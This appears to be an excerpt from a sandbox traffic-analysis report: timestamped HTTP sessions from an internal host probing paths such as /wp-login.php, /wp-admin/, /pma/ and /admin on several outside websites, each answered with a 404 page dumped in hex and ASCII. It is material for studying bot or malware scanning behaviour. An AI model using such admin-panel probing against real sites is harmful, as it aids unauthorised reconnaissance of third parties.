                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.115117073 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.116302013 CET264OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://ershov.org/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.331233025 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.331260920 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                161192.168.2.65756081.177.24.8480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.902373075 CET226OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.119414091 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.119425058 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.120294094 CET264OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://ershov.org/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.336528063 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.336539984 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                162192.168.2.65765564.71.33.3180
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.922606945 CET218OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mcsmk8.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.061465979 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                163192.168.2.65766869.160.38.280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.964564085 CET218OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.133246899 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:32 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
